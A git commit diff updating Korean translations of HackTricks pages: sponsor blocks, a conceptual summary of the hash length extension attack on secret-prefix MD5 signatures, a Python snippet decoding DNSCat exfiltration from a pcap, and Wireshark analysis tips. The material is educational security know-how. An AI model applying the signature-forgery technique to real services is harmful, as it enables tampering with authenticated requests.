Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.

This commit is contained in:
Translator 2024-04-18 04:10:00 +00:00
parent 4fcbd60099
commit c1578a6acd
35 changed files with 1081 additions and 980 deletions

View file

@ -20,7 +20,7 @@ _Hacktricks 로고 및 모션 디자인은_ [_@ppiernacho_](https://www.instagra
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
[**STM Cyber**](https://www.stmcyber.com)은 **해킹 불가능한 것을 해킹하라**는 슬로건을 가진 훌륭한 사이버 보안 회사입니다. 자체 연구를 수행하고 해킹 도구를 개발하여 펜테스팅, 레드팀 및 교육과 같은 여러 유용한 사이버 보안 서비스를 제공합니다.
[**STM Cyber**](https://www.stmcyber.com)은 **HACK THE UNHACKABLE**이라는 슬로건을 가진 훌륭한 사이버 보안 회사입니다. **자체 연구를 수행하고 자체 해킹 도구를 개발하여** 펜테스팅, 레드팀 및 교육과 같은 여러 유용한 사이버 보안 서비스를 제공합니다.
[**https://blog.stmcyber.com**](https://blog.stmcyber.com)에서 **블로그**를 확인할 수 있습니다.
@ -32,7 +32,7 @@ _Hacktricks 로고 및 모션 디자인은_ [_@ppiernacho_](https://www.instagra
<figure><img src=".gitbook/assets/image (42).png" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com)은 **스페인**에서 가장 중요한 사이버 보안 이벤트 중 하나이자 **유럽**에서 가장 중요한 이벤트 중 하나입니다. 기술 지식을 증진하는 것을 임무로 삼아 이 회의는 모든 분야의 기술 및 사이버 보안 전문가들을 위한 뜨거운 만남 지점입니다.
[**RootedCON**](https://www.rootedcon.com)은 **스페인**에서 가장 중요한 사이버 보안 이벤트 중 하나이며 **유럽**에서 가장 중요한 이벤트 중 하나입니다. **기술 지식을 촉진하는 미션**을 가지고 있는 이 컨퍼런스는 모든 분야의 기술 및 사이버 보안 전문가들을 위한 뜨거운 만남 지점입니다.
{% embed url="https://www.rootedcon.com/" %}
@ -44,7 +44,7 @@ _Hacktricks 로고 및 모션 디자인은_ [_@ppiernacho_](https://www.instagra
**Intigriti**는 **유럽 최고의** 윤리적 해킹 및 **버그 바운티 플랫폼**입니다.
**버그 바운티 팁**: 해커들이 만든 프리미엄 **버그 바운티 플랫폼인 Intigriti에 가입**하세요! 오늘 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)에서 가입하고 최대 **$100,000**의 바운티를 받아보세요!
**버그 바운티 팁**: **해커들에 의해 만들어진 프리미엄 버그 바운티 플랫폼인 Intigriti에 가입하세요**! 오늘 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)에서 가입하고 최대 **$100,000**까지 보상을 받아보세요!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -55,7 +55,7 @@ _Hacktricks 로고 및 모션 디자인은_ [_@ppiernacho_](https://www.instagra
<figure><img src=".gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)를 사용하여 세계에서 **가장 고급** 커뮤니티 도구를 활용한 **워크플로우를 쉽게 구축**하고 자동화할 수 있습니다.
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)를 사용하여 세계에서 **가장 고급** 커뮤니티 도구를 활용한 **워크플로우를 쉽게 구축하고 자동화**하세요.
오늘 바로 액세스하세요:
@ -70,10 +70,10 @@ _Hacktricks 로고 및 모션 디자인은_ [_@ppiernacho_](https://www.instagra
경험 많은 해커 및 버그 바운티 헌터들과 소통하려면 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 서버에 가입하세요!
* **해킹 통찰:** 해킹의 스릴과 도전에 대해 탐구하는 콘텐츠와 상호 작용
* **실시간 해킹 뉴스:** 실시간 뉴스 및 통찰을 통해 빠르게 변화하는 해킹 세계를 따라가세요
* **최신 공지:** 출시되는 최신 버그 바운티 및 중요한 플랫폼 업데이트에 대해 알아세요
* **실시간 해킹 뉴스:** 실시간 뉴스 및 통찰을 통해 빠르게 변화하는 해킹 세계를 파악하세요
* **최신 공지:** 출시되는 최신 버그 바운티 및 중요한 플랫폼 업데이트에 대해 알아세요
**[**Discord**](https://discord.com/invite/N3FrSbmwdy)에 참여하여 오늘부터 최고의 해커들과 협업을 시작하세요!
**[**Discord**](https://discord.com/invite/N3FrSbmwdy)에 참여하여 오늘부터 최고의 해커들과 협업을 시작하세요!**
***
@ -94,7 +94,7 @@ _Hacktricks 로고 및 모션 디자인은_ [_@ppiernacho_](https://www.instagra
SerpApi는 빠르고 쉬운 실시간 API를 제공하여 **검색 엔진 결과에 액세스**할 수 있습니다. 검색 엔진을 스크래핑하고 프록시를 처리하며 캡차를 해결하고 모든 풍부한 구조화된 데이터를 파싱합니다.
SerpApi의 요금제에 가입하면 Google, Bing, Baidu, Yahoo, Yandex 등 다양한 검색 엔진을 스크래핑하는 데 사용할 수 있는 50가지 이상의 API에 액세스할 수 있습니다.\
다른 제공업체와 달리 **SerpApi는 유기적 결과뿐만 아니라** 광고, 인라인 이미지 및 비디오, 지식 그래프 등 검색 결과에 포함된 모든 요소와 기능을 일관되게 포함합니다.
다른 제공업체와 달리 **SerpApi는 유기적 결과뿐만 아니라** 광고, 인라인 이미지 및 비디오, 지식 그래프 및 검색 결과에 포함된 기타 요소 및 기능을 일관되게 포함합니다.
현재 SerpApi 고객으로는 **Apple, Shopify 및 GrubHub**이 포함되어 있습니다.\
자세한 정보는 [**블로그**](https://serpapi.com/blog/)를 확인하거나 [**플레이그라운드**](https://serpapi.com/playground)에서 예제를 시도해보세요.\
@ -114,20 +114,20 @@ SerpApi의 요금제에 가입하면 Google, Bing, Baidu, Yahoo, Yandex 등 다
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
**WebSec**는 **암스테르담**에 본사를 둔 전문적인 사이버 보안 회사로, **현대적인** 접근 방식으로 세계 각지의 비즈니스를 **최신 사이버 보안 위협으로부터 보호**하는 데 도움을 줍니다.
**WebSec**는 **암스테르담**에 본사를 둔 전문적인 사이버 보안 회사로, **현대적인** 접근 방식으로 비즈니스를 **전 세계적으로** 최신 사이버 보안 위협으로부터 보호합니다.
WebSec는 **모든 것을 하는 보안 회사**로, 펜테스팅, **보안** 감사, 인식 훈련, 피싱 캠페인, 코드 리뷰, 익스플로잇 개발, 보안 전문가 아웃소싱 등을 제공합니다.
WebSec는 **모든 것을 처리하는 보안 회사**로, 펜테스팅, **보안** 감사, 인식 훈련, 피싱 캠페인, 코드 리뷰, 익스플로잇 개발, 보안 전문가 아웃소싱 등을 제공합니다.
WebSec의 또 다른 멋진 점은 업계 평균과 달리 WebSec가 **자신들의 기술에 대해 매우 자신 있다는 것**입니다. 그들의 웹사이트에는 "**만약 우리가 해킹할 수 없다면, 지불할 필요가 없습니다!**"라고 명시되어 있습니다. 자세한 정보는 [**웹사이트**](https://websec.nl/en/) 및 [**블로그**](https://websec.nl/blog/)를 확인하세요!
위에 언급된 것 외에도 WebSec는 HackTricks의 **열렬한 지지자**입니다.
위에 언급된 것 외에도 WebSec는 HackTricks의 **열렬한 지지자**입니다.
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 확인할 수 있는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
@ -145,14 +145,14 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
<details>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**와 함께 **제로**부터 **히어로**가 되는 방법으로 **AWS 해킹 배우기**!</strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**로부터 AWS 해킹을 제로부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com) 받기
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션을 살펴보세요
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나, **트위터** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -1,26 +1,26 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 제로에서 영웅까지 AWS 해킹 배우기</strong></summary>
<summary><strong>제로부터 영월까지 AWS 해킹 배우기</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team 전문가)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나** **PDF 형식의 HackTricks 다운로드**를 원하면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 굿즈**](https://peass.creator-spring.com)를 구매하세요
* **회사가 HackTricks에 광고되길 원하거나** **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 굿즈**](https://peass.creator-spring.com) 받기
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **해킹 트릭을 공유하고 싶다면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소 PR을 제출하세요.
* **해킹 요령을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소 PR을 제출하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **도난당한 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있습니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 방지하는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료로** 사용해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -28,20 +28,20 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
# 공격 요약
일부 **알려진 평문 데이터에 비밀을 추가**하고 해당 데이터를 해싱하는 서버를 상상해보십시오. 다음을 알고 있다면:
일부 **알려진 평문 데이터****비밀****추가**하고 해당 데이터를 해싱하는 서버를 상상해보십시오. 다음을 알고 있다면:
* **비밀의 길이** (주어진 길이 범위에서도 브루트포스 가능)
* **평문 데이터**
* **알고리즘 (이 공격에 취약함)**
* **패딩이 알려져 있음**
* 일반적으로 기본값이 사용되므로 다른 3가지 요구 사항이 충족되면 이것도 해당
* 일반적으로 기본값이 사용되므로, 다른 3가지 요구 사항이 충족되면 이것도 사용
* 패딩은 비밀+데이터의 길이에 따라 달라지므로 비밀의 길이가 필요함
그러면 **공격자**가 **데이터를 추가**하고 **이전 데이터 + 추가된 데이터에 대한 유효한 서명을 생성**할 수 있습니다.
그러면 **공격자**가 **데이터를 추가**하고 **이전 데이터 + 추가된 데이터**에 대한 유효한 **서명****생성**할 수 있습니다.
## 어떻게?
기본적으로 취약한 알고리즘은 먼저 **데이터 블록을 해싱**하고, 그런 다음 **이전에 생성된 해시**(상태)에서 **다음 데이터 블록을 추가**하고 **해싱**합니다.
기본적으로 취약한 알고리즘은 먼저 **데이터 블록을 해싱**하고, 그런 다음 **이전에** 생성된 **해시**(상태)에서 **다음 데이터 블록을 추가**하고 **해싱**합니다.
그런 다음, 비밀이 "비밀"이고 데이터가 "데이터"인 경우, "secretdata"의 MD5는 6036708eba0d11f6ef52ad44e8b74d5b입니다.\
공격자가 "append" 문자열을 추가하려면:
@ -49,7 +49,7 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
* 64개의 "A"의 MD5를 생성
* 이전에 초기화된 해시의 상태를 6036708eba0d11f6ef52ad44e8b74d5b로 변경
* 문자열 "append"를 추가
* 해시를 완료하면 결과 해시는 **"비밀" + "데이터" + "패딩" + "append"에 대한 유효한 것**이 될 것입니다.
* 해시를 완료하면 결과 해시는 **"비밀" + "데이터" + "패딩" + "append"**에 대한 유효한 것이 될 것입니다.
## **도구**
@ -59,16 +59,28 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
이 공격에 대한 자세한 설명은 [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)에서 찾을 수 있습니다.
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **도난당한 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있습니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 방지하는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료로** 사용해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>제로부터 영월까지 AWS 해킹 배우기</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team 전문가)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나** **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 굿즈**](https://peass.creator-spring.com) 받기
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **해킹 요령을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
</details>

View file

@ -1,21 +1,34 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>
<summary><strong>제로부터 영월까지 AWS 해킹 배우기</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>와 함께!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **Hacking 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
* **회사가 HackTricks에 광고되길 원하거나** **PDF 형식의 HackTricks를 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 굿즈**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **해킹 트릭을 공유하려면 PR을 제출하여** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 제출하세요.
</details>
### [WhiteIntel](https://whiteintel.io)
DNSCat을 사용하여 데이터가 **암호화되지 않은 상태로 유출**되는 pcap이 있다면, 유출된 내용을 찾을 수 있습니다.
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
**첫 9바이트**는 실제 데이터가 아니라 **C\&C 통신과 관련**되어 있음을 알고 있어야 합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있습니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
---
만약 **DNSCat**을 통해 데이터가 **암호화되지 않고 유출**된 pcap 파일이 있다면, 유출된 내용을 찾을 수 있습니다.
**첫 9바이트**가 실제 데이터가 아니라 **C\&C 통신과 관련**되어 있다는 것만 알면 됩니다:
```python
from scapy.all import rdpcap, DNSQR, DNSRR
import struct
@ -34,7 +47,7 @@ last = qry
#print(f)
```
더 많은 정보를 원하시면 다음을 참조하세요: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
더 많은 정보: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
@ -44,14 +57,14 @@ python3 dnscat_decoder.py sample.pcap bad_domain
```
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 제로부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
다른 방법으로 HackTricks를 지원하는 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **Hacking 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
* **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하길 원한다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 우리의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -1,103 +1,115 @@
# Wireshark 트릭
## Wireshark 트릭
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**까지 **AWS 해킹**을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**를** **팔로우**하세요.
* **HackTricks**와 **HackTricks Cloud** github 저장소에 PR을 제출하여 **자신의 해킹 트릭을 공유**하세요.
- **회사를 HackTricks에서 광고**하거나 **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
- **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)를 **팔로우**하세요.
- **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## Wireshark 기술 향상
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)는 **다크 웹**을 활용한 검색 엔진으로, **회사** 또는 **고객**이 **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 **무료**로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
---
## Wireshark 스킬 향상
### 튜토리얼
다음 튜토리얼은 멋진 기본 트릭을 배우는 데 도움이 됩니다:
다음 튜토리얼은 멋진 기본 트릭을 배우는 데 훌륭합니다:
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
* [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
* [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
- [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
- [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
- [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
- [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
### 분석된 정보
**전문가 정보**
_**Analyze** --> **Expert Information**_을 클릭하면 분석된 패킷에 대한 **개요**를 얻을 수 있습니다:
_**Analyze** --> **Expert Information**_을 클릭하면 **분석된** 패킷에서 일어나는 일에 대한 **개요**를 얻을 수 있습니다:
![](<../../../.gitbook/assets/image (570).png>)
![](<../../../.gitbook/assets/image (253).png>)
**해결된 주소**
_**Statistics --> Resolved Addresses**_에서 포트/전송 프로토콜에서 프로토콜, MAC에서 제조업체 등과 같이 wireshark에 의해 "**해결된**" 여러 **정보**를 찾을 수 있습니다. 통신에 관련된 내용을 알아두는 것이 흥미로울 수 있습니다.
_**Statistics --> Resolved Addresses**_ 아래에서 wireshark에 의해 **해결된** 여러 **정보**를 찾을 수 있습니다. 포트/전송에서 프로토콜, MAC에서 제조업체 등과 같은 것들이 포함되어 있습니다. 통신에 관련된 것을 알아두는 것이 흥미로울 수 있습니다.
![](<../../../.gitbook/assets/image (571).png>)
![](<../../../.gitbook/assets/image (890).png>)
**프로토콜 계층 구조**
_**Statistics --> Protocol Hierarchy**_에서 통신에 관련된 **프로토콜**과 관련된 데이터를 찾을 수 있습니다.
_**Statistics --> Protocol Hierarchy**_ 아래에서 통신에 관련된 **프로토콜**을 찾을 수 있으며 그에 대한 데이터도 포함되어 있습니다.
![](<../../../.gitbook/assets/image (572).png>)
![](<../../../.gitbook/assets/image (583).png>)
**대화**
_**Statistics --> Conversations**_에서 통신에 대한 **대화 요약**과 관련된 데이터를 찾을 수 있습니다.
_**Statistics --> Conversations**_ 아래에서 통신에서의 **대화 요약**과 그에 대한 데이터를 찾을 수 있습니다.
![](<../../../.gitbook/assets/image (573).png>)
![](<../../../.gitbook/assets/image (450).png>)
**엔드포인트**
_**Statistics --> Endpoints**_에서 통신에 대한 **엔드포인트 요약**과 관련된 데이터를 찾을 수 있습니다.
_**Statistics --> Endpoints**_ 아래에서 통신에서의 **엔드포인트 요약**과 각각에 대한 데이터를 찾을 수 있습니다.
![](<../../../.gitbook/assets/image (575).png>)
![](<../../../.gitbook/assets/image (893).png>)
**DNS 정보**
_**Statistics --> DNS**_에서 캡처된 DNS 요청에 대한 통계를 찾을 수 있습니다.
_**Statistics --> DNS**_ 아래에서 캡처된 DNS 요청에 대한 통계를 찾을 수 있습니다.
![](<../../../.gitbook/assets/image (577).png>)
![](<../../../.gitbook/assets/image (1060).png>)
